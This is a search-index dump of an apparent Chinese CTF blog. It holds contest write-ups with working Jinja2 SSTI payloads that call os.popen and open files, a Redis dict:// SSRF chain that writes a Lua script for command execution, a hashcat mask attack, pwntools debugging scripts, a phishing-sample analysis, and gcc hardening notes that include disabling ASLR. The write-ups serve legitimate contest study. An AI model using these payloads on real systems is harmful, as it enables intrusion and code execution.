[{"content":"","externalUrl":"https://bili33.top/","permalink":"/links/links_ad/gamernotitle/","section":"LINKS","summary":"TECH OTAKUS SAVE THE WORLD","title":"GamerNoTitle","type":"Link_AD"},{"content":"","externalUrl":"https://www.j3r3m14h.com.cn/Je2em1ah_blog/","permalink":"/links/links_ad/jeremiah/","section":"LINKS","summary":"不会Reverse的🐭🐭","title":"Jeremiah 🐹","type":"Link_AD"},{"content":"","externalUrl":"https://blog.rkk.moe/","permalink":"/links/links_ad/phrinky/","section":"LINKS","summary":"Phrinky\u0026rsquo;s Blog","title":"Phrinky","type":"Link_AD"},{"content":"","externalUrl":"http://ak1yamam10.cn/","permalink":"/links/links_ad/ak1m1o/","section":"LINKS","summary":"","title":"Ak1M1O","type":"Link_AD"},{"content":"","externalUrl":"https://4ra1n.blogspot.com/","permalink":"/links/links_ad/fallrain/","section":"LINKS","summary":"","title":"Fallrain","type":"Link_AD"},{"content":"","externalUrl":"https://lrhtony.cn/","permalink":"/links/links_ad/lrhtony/","section":"LINKS","summary":"","title":"lrhtony","type":"Link_AD"},{"content":"","externalUrl":"https://sias2701.github.io/","permalink":"/links/links_ad/sias27/","section":"LINKS","summary":"","title":"Sias27","type":"Link_AD"},{"content":"","externalUrl":"https://zx2023qj.github.io/","permalink":"/links/links_ad/zxzx/","section":"LINKS","summary":"","title":"zxzx","type":"Link_AD"},{"content":"","externalUrl":"https://blog.rusty1e.top/","permalink":"/links/links_ad/rusty/","section":"LINKS","summary":"这是一个简陋的博客","title":"rusty","type":"Link_AD"},{"content":"","externalUrl":"https://lsjgp.github.io/","permalink":"/links/links_ad/lsjpg/","section":"LINKS","summary":"LSJGP的垃圾堆","title":"LSJPG","type":"Link_AD"},{"content":"","externalUrl":"https://keqing.moe/","permalink":"/links/links_ad/keqing/","section":"LINKS","summary":"心有所向，日复一日，必有精进","title":"Keqing","type":"Link_Friends"},{"content":" misc # 简单算术 # 想想异或\nys~xdg/m@]mjkz@vl@z~lf\u0026gt;b 直接脚本跑一遍\ndata = \u0026#34;ys~xdg/m@]mjkz@vl@z~lf\u0026gt;b\u0026#34; for shift in range(127): result = \u0026#34;\u0026#34; for i in range(len(data)): # print() result += chr(ord(data[i]) ^ shift) if result.startswith(\u0026#34;flag\u0026#34;): print(result) exit(0) # print(result) # flag{x0r_Brute_is_easy!} Crypto # 你是小哈斯? # 年轻黑客小符参加CTF大赛，他发现这个小哈斯文件的内容存在高度规律性，并且文件名中有隐藏信息，他成功找到了隐藏的信息，并破解了挑战。得意地说：“成功在于探索与质疑，碰撞是发现真相的关键！”\n356a192b7913b04c54574d18c28d46e6395428ab da4b9237bacccdf19c0760cab7aec4a8359010b0 77de68daecd823babbb58edb1c8e14d7106e83bb 1b6453892473a467d07372d45eb05abc2031647a ac3478d69a3c81fa62e60f5c3696165a4e5e6ac4 c1dfd96eea8cc2b62785275bca38ac261256e278 902ba3cda1883801594b6e1b452790cc53948fda fe5dbbcea5ce7e2988b8c69bcfdfde8904aabc1f 0ade7c2cf97f75d009975f4d720d1fa6c19f4897 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c 3bc15c8aae3e4124dd409035f32ea2fd6835efc9 21606782c65e44cac7afbb90977d8b6f82140e76 22ea1c649c82946aa6e479e1ffd321e4a318b1b0 aff024fe4ab0fece4091de044c58c9ae4233383a 58e6b3a414a1e090dfc6029add0f3555ccba127f 4dc7c9ec434ed06502767136789763ec11d2c4b7 8efd86fb78a56a5145ed7739dcb00c78581c5375 95cb0bfd2977c761298d9624e4b4d4c72a39974a 51e69892ab49df85c6230ccc57f8e1d1606caccc 042dc4512fa3d391c5170cf3aa61e6a638f84342 7a81af3e591ac713f81ea1efe93dcf36157d8376 516b9783fca517eecbd1d064da2d165310b19759 4a0a19218e082a343a1b17e5333409af9d98f0f5 07c342be6e560e7f43842e2e21b774e61d85f047 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 54fd1711209fb1c0781092374132c66e79e2241b 60ba4b2daa4ed4d070fec06687e249e0e6f9ee45 d1854cae891ec7b29161ccaf79a24b00c274bdaa 7a81af3e591ac713f81ea1efe93dcf36157d8376 53a0acfad59379b3e050338bf9f23cfc172ee787 042dc4512fa3d391c5170cf3aa61e6a638f84342 a0f1490a20d0211c997b44bc357e1972deab8ae3 53a0acfad59379b3e050338bf9f23cfc172ee787 4a0a19218e082a343a1b17e5333409af9d98f0f5 07c342be6e560e7f43842e2e21b774e61d85f047 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 54fd1711209fb1c0781092374132c66e79e2241b c2b7df6201fdd3362399091f0a29550df3505b6a 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 a0f1490a20d0211c997b44bc357e1972deab8ae3 3c363836cf4e16666669a25da280a1865c2d2874 4a0a19218e082a343a1b17e5333409af9d98f0f5 54fd1711209fb1c0781092374132c66e79e2241b 27d5482eebd075de44389774fce28c69f45c8a75 5c2dd944dde9e08881bef0894fe7b22a5c9c4b06 13fbd79c3d390e5d6585a21e11ff5ec1970cff0c 07c342be6e560e7f43842e2e21b774e61d85f047 395df8f7c51f007019cb30201c49e884b46b92fa 11f6ad8ec52a2984abaafd7c3b516503785c2072 84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 7a38d8cbd20d9932ba948efaa364bb62651d5ad4 e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98 d1854cae891ec7b29161ccaf79a24b00c274bdaa 6b0d31c0d563223024da45691584643ac78c96e8 5c10b5b2cd673a0616d529aa5234b12ee7153808 4a0a19218e082a343a1b17e5333409af9d98f0f5 07c342be6e560e7f43842e2e21b774e61d85f047 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 54fd1711209fb1c0781092374132c66e79e2241b 60ba4b2daa4ed4d070fec06687e249e0e6f9ee45 54fd1711209fb1c0781092374132c66e79e2241b 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 6b0d31c0d563223024da45691584643ac78c96e8 58e6b3a414a1e090dfc6029add0f3555ccba127f 53a0acfad59379b3e050338bf9f23cfc172ee787 84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 22ea1c649c82946aa6e479e1ffd321e4a318b1b0 e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98 53a0acfad59379b3e050338bf9f23cfc172ee787 042dc4512fa3d391c5170cf3aa61e6a638f84342 a0f1490a20d0211c997b44bc357e1972deab8ae3 042dc4512fa3d391c5170cf3aa61e6a638f84342 a0f1490a20d0211c997b44bc357e1972deab8ae3 53a0acfad59379b3e050338bf9f23cfc172ee787 84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 11f6ad8ec52a2984abaafd7c3b516503785c2072 95cb0bfd2977c761298d9624e4b4d4c72a39974a 395df8f7c51f007019cb30201c49e884b46b92fa c2b7df6201fdd3362399091f0a29550df3505b6a 3a52ce780950d4d969792a2559cd519d7ee8c727 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 a0f1490a20d0211c997b44bc357e1972deab8ae3 3c363836cf4e16666669a25da280a1865c2d2874 4a0a19218e082a343a1b17e5333409af9d98f0f5 54fd1711209fb1c0781092374132c66e79e2241b 27d5482eebd075de44389774fce28c69f45c8a75 5c2dd944dde9e08881bef0894fe7b22a5c9c4b06 13fbd79c3d390e5d6585a21e11ff5ec1970cff0c 07c342be6e560e7f43842e2e21b774e61d85f047 395df8f7c51f007019cb30201c49e884b46b92fa 11f6ad8ec52a2984abaafd7c3b516503785c2072 84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 7a38d8cbd20d9932ba948efaa364bb62651d5ad4 e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98 d1854cae891ec7b29161ccaf79a24b00c274bdaa 6b0d31c0d563223024da45691584643ac78c96e8 5c10b5b2cd673a0616d529aa5234b12ee7153808 3a52ce780950d4d969792a2559cd519d7ee8c727 22ea1c649c82946aa6e479e1ffd321e4a318b1b0 aff024fe4ab0fece4091de044c58c9ae4233383a 58e6b3a414a1e090dfc6029add0f3555ccba127f 4dc7c9ec434ed06502767136789763ec11d2c4b7 8efd86fb78a56a5145ed7739dcb00c78581c5375 95cb0bfd2977c761298d9624e4b4d4c72a39974a 51e69892ab49df85c6230ccc57f8e1d1606caccc 042dc4512fa3d391c5170cf3aa61e6a638f84342 7a81af3e591ac713f81ea1efe93dcf36157d8376 516b9783fca517eecbd1d064da2d165310b19759 4a0a19218e082a343a1b17e5333409af9d98f0f5 07c342be6e560e7f43842e2e21b774e61d85f047 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 54fd1711209fb1c0781092374132c66e79e2241b 60ba4b2daa4ed4d070fec06687e249e0e6f9ee45 d1854cae891ec7b29161ccaf79a24b00c274bdaa 7a81af3e591ac713f81ea1efe93dcf36157d8376 53a0acfad59379b3e050338bf9f23cfc172ee787 042dc4512fa3d391c5170cf3aa61e6a638f84342 a0f1490a20d0211c997b44bc357e1972deab8ae3 53a0acfad59379b3e050338bf9f23cfc172ee787 4a0a19218e082a343a1b17e5333409af9d98f0f5 07c342be6e560e7f43842e2e21b774e61d85f047 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 54fd1711209fb1c0781092374132c66e79e2241b c2b7df6201fdd3362399091f0a29550df3505b6a 356a192b7913b04c54574d18c28d46e6395428ab da4b9237bacccdf19c0760cab7aec4a8359010b0 77de68daecd823babbb58edb1c8e14d7106e83bb 1b6453892473a467d07372d45eb05abc2031647a ac3478d69a3c81fa62e60f5c3696165a4e5e6ac4 c1dfd96eea8cc2b62785275bca38ac261256e278 902ba3cda1883801594b6e1b452790cc53948fda fe5dbbcea5ce7e2988b8c69bcfdfde8904aabc1f 0ade7c2cf97f75d009975f4d720d1fa6c19f4897 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c 3bc15c8aae3e4124dd409035f32ea2fd6835efc9 21606782c65e44cac7afbb90977d8b6f82140e76 使用hash-identifier判断是sha1\n使用脚本跑一遍得到结果\nimport hashlib f = open(\u0026#34;data.txt\u0026#34;, \u0026#34;r\u0026#34;) data = f.readlines() flag = \u0026#34;\u0026#34; for c in data: for i in range(128): hash = hashlib.sha1(str(chr(i)).encode()).hexdigest() if c.strip() == hash: flag += chr(i) # print(i, hash, c) print(flag) 1234567890-=qwertyuiopflag{no_is_flag}asdfghjklzxcvbnm,flag{game_cqb_isis_cxyz}.asdfghjklzxcvbnm,.qwertyuiopflag{no_is_flag}1234567890-=\n通往哈希的旅程 # 在数字城，大家都是通过是通过数字电话进行的通信,常见是以188开头的11位纯血号码组成，亚历山大抵在一个特殊的地方截获一串特殊的字符串\u0026quot;ca12fd8250972ec363a16593356abb1f3cf3a16d\u0026quot;，通过查阅发现这个跟以前散落的国度有点相似，可能是去往哈希国度的。年轻程序员亚力山大抵对这个国度充满好奇，决定破译这个哈希值。在经过一段时间的摸索后，亚力山大抵凭借强大的编程实力成功破解，在输入对应字符串后瞬间被传送到一个奇幻的数据世界，同时亚力山大抵也开始了他的进修之路。(提交格式：flag{11位号码}）\n将ca12fd8250972ec363a16593356abb1f3cf3a16d放在hash.txt中使用hashcat爆破\nhashcat -m 100 -a 3 hash 188?d?d?d?d?d?d?d?d --show ca12fd8250972ec363a16593356abb1f3cf3a16d:18876011645\nflag{18876011645}\nWEB # easy_flask # 使用{{7*7}}测试发现SSTI\n本题没有任何过滤，直接进行利用即可\n{{().__class__.__base__.__subclasses__()[216].__init__.__globals__.__builtins__[\u0026#39;eval\u0026#39;](\u0026#39;__import__(\u0026#34;os\u0026#34;).popen(\u0026#34;cat flag\u0026#34;).read()\u0026#39;)}} Reverse # ezre # 一些关键逻辑:\nunsigned __int64 main_program() { unsigned int seed[2]; // [rsp+20h] [rbp-80h] BYREF __int64 v2; // [rsp+28h] [rbp-78h] char s[48]; // [rsp+30h] [rbp-70h] BYREF _BYTE s1[56]; // [rsp+60h] [rbp-40h] BYREF unsigned __int64 v5; // [rsp+98h] [rbp-8h] v5 = __readfsqword(0x28u); *(_QWORD *)seed = 0LL; v2 = 0LL; custom_md5_init(seed); srand(seed[0]); printf(\u0026#34;Enter input: \u0026#34;); fgets(s, 43, stdin); if ( strlen(s) == 42 ) { memset(s1, 0, 0x2BuLL); xor_string_with_rand(s, s1); if ( !memcmp(s1, \u0026amp;ida_chars, 0x2BuLL) ) puts(\u0026#34;right\u0026#34;); else puts(\u0026#34;wrong\u0026#34;); } else { puts(\u0026#34;Invalid input length.\u0026#34;); } return v5 - __readfsqword(0x28u); } void __fastcall xor_string_with_rand(__int64 a1, __int64 a2) { int i; // [rsp+18h] [rbp-8h] for ( i = 0; i \u0026lt;= 41; ++i ) *(_BYTE *)(i + a2) = (rand() % 127) ^ *(_BYTE *)(i + a1); } 分析:\n随机种子是提前置顶的，因此每次生成的随机数是固定的 初始化种子的过程懒得分析，但是可以使用动态调试获得初始化后的种子 采用的异或进行加密，因此再次进行异或一次就可得到原文 手写解密脚本跑出来是乱码，不懂，于是直接使用原本的程序来进行解密\n具体思路：\n使用IDA提取密文，用脚本将密文(含不可打印字符)传入程序，动态调试取得程序再次异或（解密）的密文\nfrom pwn import * li = lambda x : print(\u0026#39;\\x1b[01;38;5;214m\u0026#39; + str(x) + \u0026#39;\\x1b[0m\u0026#39;) ll = lambda x : print(\u0026#39;\\x1b[01;38;5;1m\u0026#39;+ str(x) + \u0026#39;\\x1b[0m\u0026#39;) # Config LOCAL = True file = \u0026#39;./ezre\u0026#39; remote_addr = \u0026#39;localhost\u0026#39; remote_port = 65535 context.log_level=\u0026#39;DEBUG\u0026#39; # [\u0026#39;CRITICAL\u0026#39;, \u0026#39;DEBUG\u0026#39;, \u0026#39;ERROR\u0026#39;, \u0026#39;INFO\u0026#39;, \u0026#39;NOTSET\u0026#39;, \u0026#39;WARNING\u0026#39;] elf = ELF(file) context.binary = elf rop = ROP(elf) def dbg(p : process): if LOCAL: gdb.attach(p, \u0026#39;x-pwn\u0026#39;) def get_Process(): if LOCAL: p = process(file) else: p = remote(remote_addr ,remote_port) return p def exp(): p = get_Process() # Real Start of EXP dbg(p) data = b\u0026#34;\\x5C\\x76\\x4A\\x78\\x15\\x62\\x05\\x7C\\x6B\\x21\\x40\\x66\\x5B\\x1A\\x48\\x7A\\x1E\\x46\\x7F\\x28\\x02\\x75\\x68\\x2A\\x34\\x0C\\x4B\\x1D\\x3D\\x2E\\x6B\\x7A\\x17\\x45\\x07\\x75\\x47\\x27\\x39\\x78\\x61\u0026#34; p.sendline(data) p.interactive() flag = p.recvline_startswith(b\u0026#39;flag\u0026#39;).decode() li(\u0026#34;[+] Got Flag!\u0026#34;) print(flag) p.close() if __name__ == \u0026#39;__main__\u0026#39;: exp() # 原理: 异或两次即可得到原文 # gdb 调试操作: # b *main_program+153 # c # n 20 # gdb 结果: # ► 0x55a8ff6f34f9 \u0026lt;main_program+244\u0026gt; mov rsi, rcx RSI =\u0026gt; 0x55a8ff6f6020 (ida_chars) ◂— 0x7c056215784a765c # 0x55a8ff6f34fc \u0026lt;main_program+247\u0026gt; mov rdi, rax RDI =\u0026gt; 0x7fff23392bc0 ◂— \u0026#39;flag{b799eb3a-59ee-4b3b-b49d-39080fc23e99|\u0026#39; # 0x55a8ff6f34ff \u0026lt;main_program+250\u0026gt; call memcmp@plt \u0026lt;memcmp@plt\u0026gt; 再次验证确认flag正确:\nflag{b799eb3a-59ee-4b3b-b49d-39080fc23e99}\n","date":"2025年1月19日","externalUrl":null,"permalink":"/posts/cqgame2024_winter/","section":"Posts","summary":"2024年春秋杯网络安全联赛冬季赛 个人WriteUP","title":"2024年春秋杯 冬季赛","type":"posts"},{"content":"","date":"2025年1月19日","externalUrl":null,"permalink":"/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"},{"content":"","date":"2025年1月19日","externalUrl":null,"permalink":"/tags/ctf/","section":"Tags","summary":"","title":"ctf","type":"tags"},{"content":" 最近的文章 2024年春秋杯 冬季赛 2025年1月19日\u0026middot;524 字\u0026middot;3 分钟 writeup writeup ctf 2024年春秋杯网络安全联赛冬季赛 个人WriteUP 第八届西湖论剑 2025年1月18日\u0026middot;162 字\u0026middot;1 分钟 writeup writeup ctf 第八届西湖论剑 个人WriteUP Gcc 编译保护选项 2025年1月15日\u0026middot;255 字\u0026middot;2 分钟 notes notes ctf Gcc 编译保护选项 CCSSSC2025 2025年1月5日\u0026middot;78 字\u0026middot;1 分钟 writeup writeup ctf 软件安全攻防赛 2025 个人WriteUP ADCTF2024 2024年12月2日\u0026middot;2295 字\u0026middot;11 分钟 writeup writeup ctf AD工作室2024招新赛 个人WriteUP 更多文章 ","date":"2025年1月19日","externalUrl":null,"permalink":"/","section":"HOME","summary":" 最近的文章 2024年春秋杯 冬季赛 2025年1月19日\u0026middot;524 字\u0026middot;3 分钟 writeup writeup ctf 2024年春秋杯网络安全联赛冬季赛 个人WriteUP 第八届西湖论剑 2025年1月18日\u0026middot;162 字\u0026middot;1 分钟 writeup writeup ctf 第八届西湖论剑 个人WriteUP Gcc 编译保护选项 2025年1月15日\u0026middot;255 字\u0026middot;2 分钟 notes notes ctf Gcc 编译保护选项 CCSSSC2025 2025年1月5日\u0026middot;78 字\u0026middot;1 分钟 writeup writeup ctf 软件安全攻防赛 2025 个人WriteUP ADCTF2024 2024年12月2日\u0026middot;2295 字\u0026middot;11 分钟 writeup writeup ctf AD工作室2024招新赛 个人WriteUP 更多文章 ","title":"HOME","type":"page"},{"content":"","date":"2025年1月19日","externalUrl":null,"permalink":"/posts/","section":"Posts","summary":"","title":"Posts","type":"posts"},{"content":"","date":"2025年1月19日","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":"","date":"2025年1月19日","externalUrl":null,"permalink":"/categories/writeup/","section":"Categories","summary":"","title":"writeup","type":"categories"},{"content":"","date":"2025年1月19日","externalUrl":null,"permalink":"/tags/writeup/","section":"Tags","summary":"","title":"writeup","type":"tags"},{"content":" WEB # Rank-I # 尝试rce\n{{().__class__.__base__.__subclasses__()[80].__init__.__globals__.__builtins__[\u0026#39;eval\u0026#39;](\u0026#39;__import__(\u0026#34;os\u0026#34;).popen(\u0026#34;ls ..\u0026#34;).read()\u0026#39;)}} app bin boot dev etc flagf149 home lib lib64 media mnt opt proc root run sbin srv start.sh sys tmp usr var 得知根目录下有flagf419文件应该是flag，直接读取读不了\n{{().__class__.__base__.__subclasses__()[80].__init__.__globals__.__builtins__[\u0026#39;eval\u0026#39;](\u0026#39;open(\u0026#34;app.py\u0026#34;).read()\u0026#39;)}} 拿到源代码:\nfrom flask import Flask, request, render_template, render_template_string, redirect, url_for, abort from urllib.parse import unquote app = Flask(__name__) phone = \u0026#39;\u0026#39; def is_safe_input(user_input): # unsafe_keywords = [\u0026#39;eval\u0026#39;, \u0026#39;exec\u0026#39;, \u0026#39;os\u0026#39;, \u0026#39;system\u0026#39;, \u0026#39;import\u0026#39;, \u0026#39;__import__\u0026#39;] unsafe_keywords = [\u0026#39;flag\u0026#39;,\u0026#39;?\u0026#39;,\u0026#39;*\u0026#39;,\u0026#39;-\u0026#39;,\u0026#39;less\u0026#39;,\u0026#39;nl\u0026#39;,\u0026#39;tac\u0026#39;,\u0026#39;more\u0026#39;,\u0026#39;tail\u0026#39;,\u0026#39;od\u0026#39;,\u0026#39;grep\u0026#39;,\u0026#39;awd\u0026#39;,\u0026#39;sed\u0026#39;,\u0026#39;64\u0026#39;,\u0026#39;/\u0026#39;,\u0026#39;%2f\u0026#39;,\u0026#39;%2F\u0026#39;] if any(keyword in user_input for keyword in unsafe_keywords): # if user_input in unsafe_keywords: return True return False @app.route(\u0026#34;/\u0026#34;) def index(): return render_template(\u0026#34;index.html\u0026#34;) @app.route(\u0026#34;/login\u0026#34;, methods=[\u0026#34;POST\u0026#34;]) def login(): global phone phone = request.form.get(\u0026#34;phone_number\u0026#34;) return render_template(\u0026#34;login.html\u0026#34;) @app.route(\u0026#34;/cpass\u0026#34;, methods=[\u0026#34;POST\u0026#34;]) def check(): global phone password = request.form.get(\u0026#34;password\u0026#34;) if is_safe_input(phone): return redirect(url_for(\u0026#39;index\u0026#39;)) if phone != \u0026#34;1686682318\u0026#34; and password != \u0026#34;Happy_news_admin\u0026#34;: return render_template_string(\u0026#39;\u0026lt;!DOCTYPE html\u0026gt;\\ \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt;\\ \u0026lt;head\u0026gt;\\ \u0026lt;meta charset=\u0026#34;UTF-8\u0026#34;\u0026gt;\\ \u0026lt;title\u0026gt;login failed\u0026lt;/title\u0026gt;\\ \u0026lt;/head\u0026gt;\\ \u0026lt;body\u0026gt;\\ \u0026lt;script\u0026gt;alert(\u0026#34;{}The number does not exist or the password is incorrect!\u0026#34;) \u0026lt;/script\u0026gt;\\ \u0026lt;script\u0026gt;window.location.href = \u0026#34;/\u0026#34;;\u0026lt;/script\u0026gt;\\ \u0026lt;/body\u0026gt;\\ \u0026lt;/html\u0026gt;\u0026#39;.format(phone)) else: return redirect(url_for(\u0026#39;index\u0026#39;)) if __name__ == \u0026#39;__main__\u0026#39;: app.run(host=\u0026#34;0.0.0.0\u0026#34;, port=int(\u0026#34;5005\u0026#34;), debug=True) 查看源码发现过滤了['flag','?','*','-','less','nl','tac','more','tail','od','grep','awd','sed','64','/','%2f','%2F']\n{{().__class__.__base__.__subclasses__()[80].__init__.__globals__.__builtins__[\u0026#39;eval\u0026#39;](\u0026#39;open(chr(47)+\u0026#34;fla\u0026#34;+\u0026#34;gf149\u0026#34;).read()\u0026#39;)}} 拿到flag\nDASCTF{49467766377144059055627981055717}\n","date":"2025年1月18日","externalUrl":null,"permalink":"/posts/gcsis_8/","section":"Posts","summary":"第八届西湖论剑 个人WriteUP","title":"第八届西湖论剑","type":"posts"},{"content":" 本文摘自linux程序保护机制\u0026amp;gcc编译选项\n原作者: HAPPYers\n总结 # NX：-z execstack / -z noexecstack (关闭 / 开启) Canary：-fno-stack-protector /-fstack-protector / -fstack-protector-all (关闭 / 开启 / 全开启) PIE：-no-pie / -pie (关闭 / 开启) RELRO：-z norelro / -z lazy / -z now (关闭 / 部分开启 / 完全开启) Canary # gcc在4.2版本中添加了-fstack-protector和-fstack-protector-all编译参数以支持栈保护功能，4.9新增了-fstack-protector-strong编译参数让保护的范围更广。 编译控制选项\ngcc -o test test.c // 默认情况下，不开启Canary保护 gcc -fno-stack-protector -o test test.c //禁用栈保护 gcc -fstack-protector -o test test.c //启用堆栈保护，不过只为局部变量中含有 char 数组的函数插入保护代码 gcc -fstack-protector-all -o test test.c //启用堆栈保护，为所有函数插入保护代码 Fortify # fority其实非常轻微的检查，用于检查是否存在缓冲区溢出的错误。适用情形是程序采用大量的字符串或者内存操作函数，如memcpy，memset，stpcpy，strcpy，strncpy，strcat，strncat，sprintf，snprintf，vsprintf，vsnprintf，gets以及宽字符的变体。\n_FORTIFY_SOURCE 设为1，并且将编译器设置为优化1(gcc -O1)，以及出现上述情形，那么程序编译时就会进行检查但又不会改变程序功能 _FORTIFY_SOURCE 设为2，有些检查功能会加入，但是这可能导致程序崩溃。 gcc -D_FORTIFY_SOURCE=1 仅仅只会在编译时进行检查 (特别像某些头文件 #include \u0026lt;string.h\u0026gt;) gcc -D_FORTIFY_SOURCE=2 程序执行时也会有检查 (如果检查到缓冲区溢出，就终止程序)\ngcc -o test test.c // 默认情况下，不会开这个检查 gcc -D_FORTIFY_SOURCE=1 -o test test.c // 较弱的检查 gcc -D_FORTIFY_SOURCE=2 -o test test.c // 较强的检查 NX(DEP) # NX即No-eXecute（不可执行）的意思，NX（DEP）的基本原理是将数据所在内存页标识为不可执行，当程序溢出成功转入shellcode时，程序会尝试在数据页面上执行指令，此时CPU就会抛出异常，而不是去执行恶意指令。 gcc编译器默认开启了NX选项，如果需要关闭NX选项，可以给gcc编译器添加-z execstack参数\ngcc -o test test.c // 默认情况下，开启NX保护 gcc -z execstack -o test test.c // 禁用NX保护 gcc -z noexecstack -o test test.c // 开启NX保护 PIE(ASLR) # 内存地址随机化机制（address space layout randomization)，有以下三种情况\n0 - 表示关闭进程地址空间随机化。 1 - 表示将mmap的基址，stack和vdso页面随机化。 2 - 表示在1的基础上增加栈（heap）的随机化。 Linux关闭PIE的方法如下 sudo -s echo 0 \u0026gt; /proc/sys/kernel/randomize_va_space gcc编译选项 gcc -o test test.c // 默认情况下，不开启PIE gcc -fpie -pie -o test test.c // 开启PIE，此时强度为1 gcc -fPIE -pie -o test test.c // 开启PIE，此时为最高强度2 gcc -fpic -o test test.c // 开启PIC，此时强度为1，不会开启PIE gcc -fPIC -o test test.c // 开启PIC，此时为最高强度2，不会开启PIE 说明 # PIE最早由RedHat的人实现，他在连接起上增加了-pie选项，这样使用-fPIE编译的对象就能通过连接器得到位置无关可执行程序。fPIE和fPIC有些不同。可以参考Gcc和Open64中的-fPIC选项.\ngcc中的-fpic选项，使用于在目标机支持时，编译共享库时使用。编译出的代码将通过全局偏移表(Global Offset Table)中的常数地址访存，动态装载器将在程序开始执行时解析GOT表项(注意，动态装载器操作系统的一部分，连接器是GCC的一部分)。而gcc中的-fPIC选项则是针对某些特殊机型做了特殊处理，比如适合动态链接并能避免超出GOT大小限制之类的错误。而Open64仅仅支持不会导致GOT表溢出的PIC编译。\ngcc中的-fpie和-fPIE选项和fpic及fPIC很相似，但不同的是，除了生成为位置无关代码外，还能假定代码是属于本程序。通常这些选项会和GCC链接时的-pie选项一起使用。fPIE选项仅能在编译可执行码时用，不能用于编译库。所以，如果想要PIE的程序，需要你除了在gcc增加-fPIE选项外，还需要在ld时增加-pie选项才能产生这种代码。即gcc -fpie -pie来编译程序。单独使用哪一个都无法达到效果。\nRELRO # GCC, GNU linker以及Glibc-dynamic linker一起配合实现了一种叫做relro的技术: read only relocation。大概实现就是由linker指定binary的一块经过dynamic linker处理过 relocation之后的区域为只读. 设置符号重定向表格为只读或在程序启动时就解析并绑定所有动态符号，从而减少对GOT（Global Offset Table）攻击。RELRO为” Partial RELRO”，说明我们对GOT表具有写权限。\ngcc编译选项\ngcc -o test test.c // 默认情况下，是Partial RELRO gcc -z norelro -o test test.c // 关闭，即No RELRO gcc -z lazy -o test test.c // 部分开启，即Partial RELRO gcc -z now -o test test.c // 全部开启，即Full RELRO ","date":"2025年1月15日","externalUrl":null,"permalink":"/posts/gcc_compile_options/","section":"Posts","summary":"Gcc 编译保护选项","title":"Gcc 编译保护选项","type":"posts"},{"content":"","date":"2025年1月15日","externalUrl":null,"permalink":"/categories/notes/","section":"Categories","summary":"","title":"notes","type":"categories"},{"content":"","date":"2025年1月15日","externalUrl":null,"permalink":"/tags/notes/","section":"Tags","summary":"","title":"notes","type":"tags"},{"content":" WEB # CachedVisitor # 题目附件\n部分有用的测试：\n容器出网且可读取文件\ndict协议可用，可访问redis\n分析了一下源代码\nmain.lua从visit.script中读取\\##LUA_START##和##LUA_END##之间的内容作为脚本运行\nCOPY flag /flag COPY readflag /readflag RUN chmod 400 /flag RUN chmod +xs /readflag flag设置了权限无法直接读取\n尝试使用redis写visit.script进行RCE\n在本地docker编写lua测试可以输出flag\n##LUA_START##ngx.say(io.popen(\u0026#39;/readflag\u0026#39;):read(\u0026#39;*all\u0026#39;))##LUA_END## 直接使用redis将lua写入visit.script\ndict://127.0.0.1:6379/set:payload:\u0026#34;##LUA_START##ngx.say(io.popen(\u0026#39;/readflag\u0026#39;):read(\u0026#39;*all\u0026#39;))##LUA_END##\u0026#34; dict://127.0.0.1:6379/config:set:dir:/scripts/ dict://127.0.0.1:6379/config:set:dbfilename:visit.script dict://127.0.0.1:6379/bgsave 写入之后随意发送一个请求即可执行我们写入的脚本\ndart{dc2e4048-dca7-4fa3-9803-8ee9d785af2b}\nMisc # Fishing E-mail # Bob收到了一份钓鱼邮件，请找出木马的回连地址和端口。 假如回连地址和端口为123.213.123.123:1234，那么敏感信息为MD5(123.213.123.123:1234)，即d9bdd0390849615555d1f75fa854b14f，以Cyberchef的结果为准。\n题目附件\nContent-Transfer-Encoding: base64 发现编码格式是Base64，我们直接解码查看内容\n今天是你的24岁生日，祝你生日快乐 \u0026lt;div class=\u0026#34;qmbox\u0026#34;\u0026gt;\u0026lt;p style=\u0026#34;font-family: -apple-system, BlinkMacSystemFont, \u0026amp;quot;PingFang SC\u0026amp;quot;, \u0026amp;quot;Microsoft YaHei\u0026amp;quot;, sans-serif; font-size: 10.5pt; color: rgb(46, 48, 51);\u0026#34;\u0026gt;今天是你的24岁生日，祝你生日快乐\u0026lt;/p\u0026gt;\u0026lt;div xmail-signature=\u0026#34;\u0026#34;\u0026gt;\u0026lt;xm-signature\u0026gt;\u0026lt;/xm-signature\u0026gt;\u0026lt;p\u0026gt;\u0026lt;/p\u0026gt;\u0026lt;/div\u0026gt;\u0026lt;/div\u0026gt; 生日礼物.zip(BIN) 丢CyberChef提取zip发现有密码\nDate: Mon, 11 Nov 2024 12:54:24 +0800 根据生日推测密码20001111\n成功解压得到exe\n在虚拟机中运行后抓包得到反连地址\nMD5(222.218.218.218:55555)\ndf3101212c55ea8c417ad799cfc6b509\n","date":"2025年1月5日","externalUrl":null,"permalink":"/posts/ccsssc2025/","section":"Posts","summary":"软件安全攻防赛 2025 个人WriteUP","title":"CCSSSC2025","type":"posts"},{"content":"","date":"2025年1月1日","externalUrl":null,"permalink":"/tags/link/","section":"Tags","summary":"","title":"link","type":"tags"},{"content":"小伙伴们的博客/主页地址\n要交换友链, 请联系我. 